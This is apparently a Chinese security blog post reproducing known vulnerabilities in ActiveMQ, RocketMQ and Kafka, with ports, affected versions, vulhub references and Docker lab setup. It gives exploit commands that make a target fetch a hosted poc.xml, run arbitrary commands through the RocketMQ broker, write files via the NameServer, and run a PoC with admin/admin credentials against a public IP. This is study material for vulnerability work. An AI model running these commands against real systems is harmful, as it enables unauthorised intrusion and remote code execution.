服务攻防-处理平台安全&消息队列&ActiveMQ&RocketMQ&Kafka&Spring包&CVE复现

知识点:

服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka

消息队列:(Message Queue

基于异步通信模式的中间件技术,核心功能是在不同的应用程序、服务或组件之间传递消息(数据),起到缓冲、解耦、削峰等作用。发送方(生产者)将消息放入队列后即可返回,无需等待接收方(消费者)立即处理;接收方则从队列中按需获取消息并处理,实现了发送方和接收方的异步解耦。

常见的消息队列产品包括:(广泛应用于分布式系统、微服务架构中)
Apache Kafka、RabbitMQ、ActiveMQ、RocketMQ

演示案例-服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka

一、ActiveMQ

bash 复制代码
端口 条件
8161 web 需配置访问
61616 tcp 远程访问

开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

CVE-2022-41678

影响版本:5.16.5, 5.17.3版本及以前

参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2022-41678/README.zh-cn.md

bash 复制代码
python poc.py -u admin -p admin http://101.32.220.14:8161/




CVE-2023-46604

影响版本:5.18.2版本及以前

参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2023-46604/README.zh-cn.md

bash 复制代码
python3 -m http.server 8888
python3 poc.py 目标IP 目标端口 http://IP:8888/poc.xml





二、RocketMQ

bash 复制代码
端口号 用途说明
9876 NameServer通信端口用于客户端路由请求和Broker注册发现
10911 Broker主监听端口处理消息发送/消费等核心服务

Apache RocketMQ是一个分布式消息平台

文章复现参考:
https://mp.weixin.qq.com/s/UsjzX-HSt7QE1QeVBdEXaw
https://mp.weixin.qq.com/s/ceZY_TJqsaWyyHubrlKqSw

bash 复制代码
环境搭建:
docker pull apache/rocketmq:4.9.1  
docker pull apacherocketmq/rocketmq-console:2.0.0
docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
 

#1.创建broker文件目录
mkdir -p /NDTSec/rocketmq/conf/  
#2.创建broker.conf文件
vim /NDTSec/rocketmq/conf/broker.conf
  
#3.将下面内容复制粘贴到broker.conf配置文件中:
brokerClusterName = DefaultCluster   
brokerName = broker-a
brokerId = 0   
deleteWhen = 04   
fileReservedTime = 48   
brokerRole = ASYNC_MASTER   
flushDiskType = SYNC_FLUSH
 
#4.启动broker
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /NDTSec/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
 
5、启动console
docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv -e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876 -Dcom.rocketmq.sendMessageWithVIPChannel=false" -t apacherocketmq/rocketmq-console:2.0.0


CVE-2023-33246

文章参考:https://github.com/vulhub/vulhub/blob/master/rocketmq/CVE-2023-33246/README.zh-cn.md

项目工具:https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT

bash 复制代码
d:\Python3.8\python.exe check.py --ip ip --port 9876

项目工具:https://github.com/vulhub/rocketmq-attack

bash 复制代码
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackBroker --target ip:port --cmd "xxxx"



CVE-2023-37582

项目工具:https://github.com/Malayke/CVE-2023-37582_EXPLOIT

bash 复制代码
python.exe CVE-2023-37582.py -ip ip -p 9876

项目工具:https://github.com/vulhub/rocketmq-attack

bash 复制代码
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target 127.0.0.1:9876 --file /tmp/test.txt --data "Hello World"

三、Kafka

bash 复制代码
分布式流处理平台,用于高吞吐量实时数据传输存储和处理,
广泛应用于日志收集、消息队列、数据管道、实时分析等场景。
默认端口:9092

CVE-2023-25194

漏洞影响版本:2.3.0 <= Apache Kafka <= 3.3.2

复现地址:https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194/README.zh-cn.md






相关推荐
隔壁阿布都1 小时前
Kafka 核心组件及其作用(全解)
分布式·kafka
YuanDaima20482 小时前
WSL2 核心中间件部署实战:MySQL、Redis 与 RocketMQ
java·数据库·人工智能·redis·python·mysql·rocketmq
可观测性用观测云14 小时前
观测云日志转发至 Kafka 最佳实践
kafka
Jackyzhe1 天前
从零学习Kafka:幂等与事务
数据库·学习·kafka
一只普通的码农1 天前
Filebeat 在windows环境部署并结合kafka使用
分布式·kafka
Java识堂1 天前
Kafka 如何保证消息的可靠性投递?
分布式·kafka
NineData1 天前
还在轮询 MySQL 吗?用 NineData 把业务变更直接送进 Kafka
数据库·mysql·kafka·ninedata·数据复制·玖章算术·数据迁移工具
Devin~Y1 天前
大厂Java面试实录:Spring Boot微服务 + Redis/Kafka + Prometheus/Jaeger + RAG/Agent(小Y水货版)
java·spring boot·redis·spring cloud·kafka·prometheus·jaeger
Filwaod2 天前
Java面试:AIGC场景下的技术深度拷问-谢飞机篇
spring boot·缓存·微服务·消息队列·aigc·java面试·ai技术